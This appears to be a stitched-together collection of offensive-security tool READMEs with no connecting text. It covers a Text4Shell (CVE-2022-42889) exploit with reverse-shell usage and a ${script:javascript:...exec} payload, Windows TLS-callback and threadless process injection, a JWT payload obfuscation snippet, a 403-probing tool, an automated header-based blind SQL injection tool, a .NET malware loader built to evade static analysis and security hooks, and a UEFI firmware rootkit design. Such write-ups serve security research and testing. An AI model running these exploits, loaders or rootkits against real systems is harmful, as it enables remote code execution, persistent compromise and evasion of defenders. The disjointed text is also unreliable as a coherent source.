A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions < 1.10. This exploit targets vulnerable Java applications that use the StringSubstitutor
class with interpolation enabled, allowing injection of ${script:...}
expressions to execute arbitrary system commands.
In this PoC, exploitation is demonstrated via the data
query parameter; however, the vulnerable parameter name may vary depending on the implementation. Users should adapt the payload and request path accordingly based on the target application's logic.
Disclaimer: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.
This is a custom Python3 exploit for the Apache Commons Text vulnerability known as Text4Shell (CVE-2022-42889). It allows Remote Code Execution (RCE) via insecure interpolators when user input is dynamically evaluated by StringSubstitutor
.
Tested against: - Apache Commons Text < 1.10.0 - Java applications using ${script:...}
interpolation from untrusted input
python3 text4shell.py <target_ip> <callback_ip> <callback_port>
python3 text4shell.py 127.0.0.1 192.168.1.2 4444
nc -nlvp 4444
The script injects:
${script:javascript:java.lang.Runtime.getRuntime().exec(...)}
The reverse shell is sent via /data
parameter using a POST request.
New Module 34: TLS Callbacks For Anti-Debugging
New Module 35: Threadless Injection
The PoC follows these steps:
CreateProcessViaWinAPIsW
function (i.e. RuntimeBroker.exe
).g_FixedShellcode
and the main payload.The g_FixedShellcode
shellcode will then make sure that the main payload executes only once by restoring the original TLS callback's original address before calling the main payload. A TLS callback can execute multiple times across the lifespan of a process, therefore it is important to control the number of times the payload is triggered by restoring the original code path execution to the original TLS callback function.
The following image shows our implementation, RemoteTLSCallbackInjection.exe
, spawning a cmd.exe
as its main payload.
A JSON Web Token (JWT, pronounced "jot") is a compact and URL-safe way of passing a JSON message between two parties. It's a standard, defined in RFC 7519. The token is a long string, divided into parts separated by dots. Each part is base64 URL-encoded.
What parts the token has depends on the type of the JWT: whether it's a JWS (a signed token) or a JWE (an encrypted token). If the token is signed it will have three sections: the header, the payload, and the signature. If the token is encrypted it will consist of five parts: the header, the encrypted key, the initialization vector, the ciphertext (payload), and the authentication tag. Probably the most common use case for JWTs is to utilize them as access tokens and ID tokens in OAuth and OpenID Connect flows, but they can serve different purposes as well.
This code snippet offers a tweak perspective aiming to enhance the security of the payload section when decoding JWT tokens, where the stored keys are visible in plaintext. This code snippet provides a tweak perspective aiming to enhance the security of the payload section when decoding JWT tokens. Typically, the payload section appears in plaintext when decoded from the JWT token (base64). The main objective is to lightly encrypt or obfuscate the payload values, making it difficult to discern their meaning. The intention is to ensure that even if someone attempts to decode the payload values, they cannot do so easily.
The idea behind attempting to obscure the value of the key named "userid" is as follows:
and..^^
in the example, the key is shown as { 'userid': 'random_value' },
making it apparent that it represents a user ID.
However, this is merely for illustrative purposes.
In practice, a predetermined and undisclosed name is typically used.
For example, 'a': 'changing_random_value'
Attempting to tamper with JWT tokens generated using this method requires access to both the JWT secret key and the XOR symmetric key used to create the UserID.
# python3 main.py
- Current Unix Timestamp: 1709160368
- Current Unix Timestamp to Human Readable: 2024-02-29 07:46:08
- userid: 23243232
- XOR Symmetric key: b'generally_user_salt_or_hash_or_random_uuid_this_value_must_be_in_dbms'
- JWT Secret key: yes_your_service_jwt_secret_key
- Encoded UserID and Timestamp: VVZcUUFTX14FOkdEUUFpEVZfTWwKEGkLUxUKawtHOkAAW1RXDGYWQAo=
- Decoded UserID and Hashed Timestamp: 23243232|e27436b7393eb6c2fb4d5e2a508a9c5c
- JWT Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0aW1lc3RhbXAiOiIyMDI0LTAyLTI5IDA3OjQ2OjA4IiwidXNlcmlkIjoiVlZaY1VVRlRYMTRGT2tkRVVVRnBFVlpmVFd3S0VHa0xVeFVLYXd0SE9rQUFXMVJYREdZV1FBbz0ifQ.bM_6cBZHdXhMZjyefr6YO5n5X51SzXjyBUEzFiBaZ7Q
- Decoded JWT: {'timestamp': '2024-02-29 07:46:08', 'userid': 'VVZcUUFTX14FOkdEUUFpEVZfTWwKEGkLUxUKawtHOkAAW1RXDGYWQAo='}
# run again
- Decoded JWT: {'timestamp': '2024-02-29 08:16:36', 'userid': 'VVZcUUFTX14FaRNAVBRpRQcORmtWRGl eVUtRZlYXaBZZCgYOWGlDR10='}
- Decoded JWT: {'timestamp': '2024-02-29 08:16:51', 'userid': 'VVZcUUFTX14FZxMRVUdnEgJZEmxfRztRVUBabAsRZkdVVlJWWztGQVA='}
- Decoded JWT: {'timestamp': '2024-02-29 08:17:01', 'userid': 'VVZcUUFTX14FbxYQUkM8RVRZEmkLRWsNUBYNb1sQPREFDFYKDmYRQV4='}
- Decoded JWT: {'timestamp': '2024-02-29 08:17:09', 'userid': 'VVZcUUFTX14FbUNEVEVqEFlaTGoKQjxZBRULOlpGPUtSClALWD5GRAs='}
A cutting-edge utility designed exclusively for web security aficionados, penetration testers, and system administrators. WebSecProbe is your advanced toolkit for conducting intricate web security assessments with precision and depth. This robust tool streamlines the intricate process of scrutinizing web servers and applications, allowing you to delve into the technical nuances of web security and fortify your digital assets effectively.
WebSecProbe is designed to perform a series of HTTP requests to a target URL with various payloads in order to test for potential security vulnerabilities or misconfigurations. Here's a brief overview of what the code does:
Does This Tool Bypass 403 ?
It doesn't directly attempt to bypass a 403 Forbidden status code. The code's purpose is more about testing the behavior of the server when different requests are made, including requests with various payloads, headers, and URL variations. While some of the payloads and headers in the code might be used in certain scenarios to test for potential security misconfigurations or weaknesses, it doesn't guarantee that it will bypass a 403 Forbidden status code.
In summary, this code is a tool for exploring and analyzing a web server's responses to different requests, but whether or not it can bypass a 403 Forbidden status code depends on the specific configuration and security measures implemented by the target server.
Β
pip install WebSecProbe
WebSecProbe <URL> <Path>
Example:
WebSecProbe https://example.com admin-login
from WebSecProbe.main import WebSecProbe
if __name__ == "__main__":
url = 'https://example.com' # Replace with your target URL
path = 'admin-login' # Replace with your desired path
probe = WebSecProbe(url, path)
probe.run()
HBSQLI is an automated command-line tool for performing Header Based Blind SQL injection attacks on web applications. It automates the process of detecting Header Based Blind SQL injection vulnerabilities, making it easier for security researchers , penetration testers & bug bounty hunters to test the security of web applications.Β
This tool is intended for authorized penetration testing and security assessment purposes only. Any unauthorized or malicious use of this tool is strictly prohibited and may result in legal action.
The authors and contributors of this tool do not take any responsibility for any damage, legal issues, or other consequences caused by the misuse of this tool. The use of this tool is solely at the user's own risk.
Users are responsible for complying with all applicable laws and regulations regarding the use of this tool, including but not limited to, obtaining all necessary permissions and consents before conducting any testing or assessment.
By using this tool, users acknowledge and accept these terms and conditions and agree to use this tool in accordance with all applicable laws and regulations.
Install HBSQLI with following steps:
$ git clone https://github.com/SAPT01/HBSQLI.git
$ cd HBSQLI
$ pip3 install -r requirements.txt
usage: hbsqli.py [-h] [-l LIST] [-u URL] -p PAYLOADS -H HEADERS [-v]
options:
-h, --help show this help message and exit
-l LIST, --list LIST To provide list of urls as an input
-u URL, --url URL To provide single url as an input
-p PAYLOADS, --payloads PAYLOADS
To provide payload file having Blind SQL Payloads with delay of 30 sec
-H HEADERS, --headers HEADERS
To provide header file having HTTP Headers which are to be injected
-v, --verbose Run on verbose mode
$ python3 hbsqli.py -u "https://target.com" -p payloads.txt -H headers.txt -v
$ python3 hbsqli.py -l urls.txt -p payloads.txt -H headers.txt -v
There are basically two modes in this, verbose which will show you all the process which is happening and show your the status of each test done and non-verbose, which will just print the vulnerable ones on the screen. To initiate the verbose mode just add -v in your command
You can use the provided payload file or use a custom payload file, just remember that delay in each payload in the payload file should be set to 30 seconds.
You can use the provided headers file or even some more custom header in that file itself according to your need.
A .NET malware loader, using API-Hashing and dynamic invoking to evade static analysis
NixImports uses my managed API-Hashing implementation HInvoke, to dynamically resolve most of it's called functions at runtime. To resolve the functions HInvoke requires two hashes the typeHash and the methodHash. These hashes represent the type name and the methods FullName, on runtime HInvoke parses the entire mscorlib to find the matching type and method. Due to this process, HInvoke does not leave any import references to the methods called trough it.
Another interesting feature of NixImports is that it avoids calling known methods as much as possible, whenever applicable NixImports uses internal methods instead of their wrappers. By using internal methods only we can evade basic hooks and monitoring employed by some security tools.
For a more detailed explanation checkout my blog post.
You can generate hashes for HInvoke using this tool
NixImports only requires a filepath to the .NET binary you want to pack with it.
NixImports.exe <filepath>
It will automatically generate a new executable called Loader.exe in it's root folder. The loader executable will contain your encoded payload and the stub code required to run it.
If youre interested in detection engineering and possible detection of NixImports, checkout the last section of my blog post
Or click here for a basic yara rule covering NixImports.
bootlicker is a legacy, extensible UEFI firmware rootkit targeting vmware hypervisor virtual machines. It is designed to achieve initial code execution within the context of the windows kernel, regardless of security settings configured.
bootlicker takes its design from the legacy CosmicStrain, MoonBounce, and ESPECTRE rootkits to achive arbitrary code excution without triggering patchguard or other related security mechanisms.
After initial insertion into a UEFI driver firmware using the the injection utility, the shellcodes EfiMain achieves execution as the host starts up, and inserts a hook into the UEFI firmware's ExitBootServices routine. The ExitBootServices routine will then, on execution, find the source caller of the function, and if it matches WinLoad.EFI, attempts to find the unexported winload.efi!OslArchTransferToKernel routine, which will allow us to att ack the booting kernel before it achieves its initial execution.
Once OslArchTransferToKernel executes, it will search for the ACPI.SYS driver, find the .rsrc
PE section, and inject a small stager shellcode entrypoint called DrvMain to copy over a larger payload that will act as our kernel implant.
Entirely based upon d_olex / cr4sh's DmaBackdoorBoot
This code is apart of a larger project I've been working on that on / off in between burnout, like most of the concepts I've produced over the years under various aliases, will never see the light of day. Some of the code comments I've been to lazy to strip out that refer to unrelated functiaonlity, despite it being previously present. Do not expect this to work out of the box, some slight modifications are certainly necessary.